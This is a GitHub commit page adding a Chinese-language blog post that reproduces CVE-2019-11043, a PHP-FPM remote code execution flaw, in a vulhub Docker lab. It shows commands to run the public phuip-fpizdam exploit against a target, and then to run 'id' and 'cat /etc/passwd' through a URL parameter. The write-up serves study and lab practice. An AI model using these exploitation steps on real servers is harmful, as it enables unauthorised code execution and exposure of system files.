Skip to content

Commit

Permalink
post:PHP-FPM 远程代码执行漏洞
Browse files Browse the repository at this point in the history
  • Loading branch information
lindocedskes committed Sep 11, 2024
1 parent 30bf52c commit 004df09
Show file tree
Hide file tree
Showing 3 changed files with 55 additions and 0 deletions.
55 changes: 55 additions & 0 deletions _posts/2024-09-10-漏洞复现-PHP-FPM-远程代码执行漏洞.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,55 @@
---
title: 漏洞复现-PHP-FPM 远程代码执行漏洞
description: CVE-2019-11043 从一个小的内存溢出到代码执行
author: #有默认值
date: 2024-09-10 10:13:14 +0800
categories: [漏洞复现]
tags: [漏洞复现,RCE] # TAG names should always be lowercase
pin: # 默认false,可填true
math: true
mermaid: true
# image:
# path: /assets/bar/home.png
# lqip: data:image/webp;base64,UklGRpoAAABXRUJQVlA4WAoAAAAQAAAADwAABwAAQUxQSDIAAAARL0AmbZurmr57yyIiqE8oiG0bejIYEQTgqiDA9vqnsUSI6H+oAERp2HZ65qP/VIAWAFZQOCBCAAAA8AEAnQEqEAAIAAVAfCWkAALp8sF8rgRgAP7o9FDvMCkMde9PK7euH5M1m6VWoDXf2FkP3BqV0ZYbO6NA/VFIAAAA
# alt: # 图片名
---

## 构建

``` shell
cd vulhub/php/CVE-2019-11043
docker-compose up -d
```
cd
## 漏洞原理
https://github.com/vulhub/vulhub/blob/master/php/CVE-2019-11043/README.zh-cn.md

https://blog.orange.tw/posts/2019-10-an-analysis-and-thought-about-recently/

https://cloud.tencent.com/developer/article/1530703

这是一个非常有趣的漏洞!从一个小的内存缺陷到代码执行。它结合了二进制和网络技术,

## PoC(Proof of Concept) 验证漏洞存在的代码
作者利用了双缓冲机制,如果缓冲区到达末尾(pos > end),PHP-FPM 会创建一个新的缓冲区,并将前一个缓冲区放入结构成员 fcgi_data_seg->next 中。
若有 PHPINFO 页面。获取/info.php/%0a.php ,观察 $_SERVER['PATH_INFO'] 是否损坏!
...
影响版本:PHP 5.6-7.x,Nginx>=0.7.31
## Exp(Exploit)进行实际的攻击利用
安装漏洞利用工具,和利用
```shell
git clone https://github.com/neex/phuip-fpizdam.git
cd phuip-fpizdam
go run . "http://your-ip:8080/index.php"
```
![](../assets/img/2024-09-10/iShot_2024-09-10_22.16.48.png)
访问http://your-ip:8080/index.php?a=id,即可查看到id命令已成功执行
![](../assets/img/2024-09-10/iShot_2024-09-10_22.15.45.png)
注意:只有部分PHP-FPM子进程受到了污染,因此请尝试几次以执行RCE命令,会出现成功执行
```shell
/index.php?a=cat /etc/passwd
```


## 复现总结
无法直接通过url传入反弹shell命令,执行失败
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.

0 comments on commit 004df09

Please sign in to comment.